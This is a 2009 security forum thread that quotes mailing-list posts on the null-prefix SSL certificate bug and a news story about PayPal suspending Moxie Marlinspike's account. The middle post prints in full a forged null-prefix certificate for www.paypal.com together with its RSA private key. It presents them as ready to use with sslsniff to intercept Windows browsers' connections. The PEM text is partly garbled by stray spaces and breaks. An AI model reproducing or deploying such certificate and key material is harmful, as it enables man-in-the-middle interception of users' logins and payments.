NULL certificate CN=*\x00thoughtcrime.noisebridge.net (noisebridge-discuss)

[fnord0]

found this quite interesting! figured this'd be of interest to the backtrack community

Quote:

[Noisebridge-discuss] Merry Certmas! CN=*\x00thoughtcrime.noisebridge.net
Jacob Appelbaum jacob at appelbaum.net
Tue Sep 29 22:51:33 PDT 2009

Hello *,

In the spirit of giving and sharing, I felt it would be nice to enable other Noisebridgers (and friends of Noisebridge) to play around with bugs in SSL/TLS.

Moxie was just over and we'd discussed releasing this certificate for some time. He's already released a few certificates and I thought I'd join him. In celebration of his visit to San Francisco, I wanted to release fun-times-at-moxie-marlinspike-high. This is a text file that contains a fully valid, signed certificate (with private key) that can be used to exploit the NULL certificate prefix bug[0]. The certificate is valid for * on the internet (when exploiting libnss software). The
certificate is good for two years. It won't work for exploiting the bug for software written with the WIN32 api, they don't accept (for good reason) *! I suggest the use of Moxie's sslsniff[1] if you're so inclined to try network related testing. It may also be useful for testing code signing software.

It's been long enough that everyone should be patched for this awesome class of bugs. This certificate and corresponding private key should help people test fairly obscure software or software they've written themselves. I hope this release will help with confirmation of the bug and with regression testing. Feel free to use this certificate for anything relating to free software too. Consider it released into the public domain of interesting integers.

Enjoy!

Best,
Jacob

[0] http://thoughtcrime.org/papers/null-prefix-attacks.pdf
[1] Moxie Marlinspike >> software >> sslsniff
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: fun-times-at-moxie-marlinspike-high
Url: http://www.noisebridge.net/pipermail/noisebridge-discuss/attachments/20090929/64249b18/attachment.txt
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 155 bytes
Desc: OpenPGP digital signature
Url : http://www.noisebridge.net/pipermail/noisebridge-discuss/attachments/20090929/64249b18/attachment.pgp

anyone played with this yet?

[fnord0]

here's another null-prefix certificate, this time for www.paypal.com - thanks goes to the Full Disclosure mailing list ;;

Quote:

null-prefix certificate for paypal

From: Tim Jones <timjonesowns () yahoo com>
Date: Mon, 5 Oct 2009 10:59:31 -0700 (PDT)

If there's really a Moxie Marlinspike fan club [1], I'm definitely a member.. Attached is one of the null-prefix certificates [2] that he distributed during his "intercepting secure communication" training at Black Hat. This one's for www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, it works flawlessly with sslsniff [3] against all clients on Windows (IE, Chrome, Safari). Also, because of Moxie's attacks against OCSP [4], I don't think this certificate can be revoked.

Enjoy!

[1]: Linux Today - SSL trick certificate published
[2]: http://www.thoughtcrime.org/papers/n...ix-attacks.pdf
[3]: Moxie Marlinspike >> software >> sslsniff
[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf

-----BEGIN
CERTIFICATE-----
MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEj ELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2 Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLj EuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NT EuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eT EuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eT EgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwND E3WhcNMTEwMjI0
MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbG lmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaX R5MRQwEgYDVQQL
EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb2 0Ac3NsLnNlY3Vy
ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMI GJAoGBANJp+m86
ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV
QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dD c
L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHR
ME
AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI
KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY
MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHA YDVR0SBBUwE4ER
Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2 FuaXphdGlvbiBJ
bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcn ZlciBDZXJ0aWZp
Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLz AvBglghkgBhvhC
AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi 8wQwYJYIZIAYb4
QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMD IvaXBzY2EyMDAy
Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3 d3Lmlwc2NhLmNv
bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQw YJYIZIAYb4QgEH
BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcm VuZXdhbENMQVNF
QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lm lwc2NhLmNvbS9p
cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfD B6MDmgN6A1hjNo
dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMD AyQ0xBU0VBMS5j
cmwwPaA7o
DmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDI vaXBz
Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCC sGAQUFBzABhhZo
dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4 GBAGjueZeX3Tvv
FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB 2uu0rXudyInjd4
QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc
eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7
-----END CERTIFICATE-----

-----BEGIN RSA PRIVATE
KEY-----
MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcs KePGC5xpE9grd9
mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8 bqjllsWZ0pP
c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQ AB
AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9 MJkXRvCAy9VQI1
/6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQm C4NoyC+G4GPnr
h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQ Dx58UFfPCVwAho
J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6
4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L
MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETO l2e84BvEuygodA
qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0
j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHH xMLeJL3NxZzytW
dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUH tEmT93nFgmUvQ3
ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB
-----END RSA PRIVATE KEY-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: [Full-Disclosure] Mailing List Charter
Hosted and sponsored by Secunia - Secunia.com

[Nick_the_Greek]

Very interesting!

[fnord0]

well, this is lame... I am posting the below story in reference to the above www.paypal.com null cert ;;

Quote:

Man banished from PayPal for showing how to hack PayPal

Some hacking tools more equal than others
By Dan Goodin in San Francisco
Posted in Security, 6th October 2009 23:03 GMT

PayPal suspended the account of a white-hat hacker on Tuesday, a day after someone used his research into website authentication to publish a counterfeit certificate for the online payment processor.

"Under the Acceptable Use Policy, PayPal may not be used to send or receive payments for items that show the personal information of third parties in violation of applicable law," company representatives wrote in an email sent to the hacker, Moxie Marlinspike. "Please understand that this is a security measure meant to help protect you and your account. We apologize for any inconvenience."

The email, sent from an unmonitored PayPal address, makes no mention of the item that violates the PayPal policy. The suspension effectively freezes more than $500 in the account until Marlinspike submits a signed affidavit swearing he has removed the PayPal logos from his site.

Since 2002, Marlinspike has included a yellow donate button on the download page for a hacking tool he calls SSLSniff, and more recently he released a program called SSLStrip, which also includes the button. But it was only after someone published counterfeit SSL certificate on Monday that PayPal took action against the account.

"This is not something I had anything to do with, and they responded by suspending my account," Marlinspike told The Reg. "I've been the one trying to warn them of this in the first place."

The account suspension is troubling because it penalizes an independent security researcher whose discoveries have already yielded important insights into secure sockets layer, one of the web's oldest and most relied upon measures for preventing man-in-the-middle attacks. It's the latest action to demonize hacker tools that can be used by security professionals for good because they can also be used by criminals for bad.

It also flies in the face of the tacit approval of PayPal and its parent company, eBay, give to groups distributing dozens of other hacking tools. No doubt, the Wireshark packet sniffer is used regularly to reveal the passwords of unsuspecting victims, and yet its purveyors accept payments by PayPal. The same goes for the Cain & Abel and l0phtcrack password recovery tools and Remote-Exploit.org, a group whose tag line reads: "Supplying offensive security products to the world."

A PayPal spokeswoman said the company's privacy policy prevented her from discussing Marlinspike's case. But in general, she said hacking tools are allowed in certain cases, such as when they can be used to legitimately help administrators assess the strength of user passwords.

"We do not, however, allow PayPal to be used in the sale or dissemination of tools which have the sole purpose to attack customers and illegally obtain individual customer information," the spokeswoman, Sara Gorman, wrote in an email. "We consider whether there is any legitimate use in helping to strengthen the defenses of one's site when determining violation of our policy."

She said PayPal relies on a dedicated team with "extensive experience in information security, law enforcement, financial services and risk" to make such decisions. She didn't explain how they determined programs such as Wireshark and Cain & Abel have legitimate uses and the tools offered by Marlinspike do not. She also didn't explain why Marlinspike's banishment came less than 24 hours after the release of the bogus PayPal certificate.

According to a note included with the certificate's release, Marlinspike distributed it during a training session at the Black Hat security conference in July. The hacker confirms he offered a class to penetration testers that taught them everything they'd need to test and carry out attacks on SSL certificates, and as part of that, he included a proof-of-concept certificate. But he never distributed the certificate and each student signed an agreement stating the material was for evaluation purposes and was not be be publicly released, he said.

And in any event, he never used PayPal to accept payment for the class. What's more, the only items being distributed on the PayPal-adorned pages are SSLStrip and SSLSniff. Bogus certificates were never available anywhere on the site, he said.

So if you're a hacker who relies on PayPal, the not-so-subtle message is to make sure your projects steer clear of your online payment processor. It doesn't matter that you speak at the same conferences attended by the rest of the security world. As PayPal well knows, hacker tools can be used for good or for bad, and the company has the sole discretion to choose which is which.

notice there how remote-exploit.org got a plug
anyways, pretty lame.... bad paypal, bad!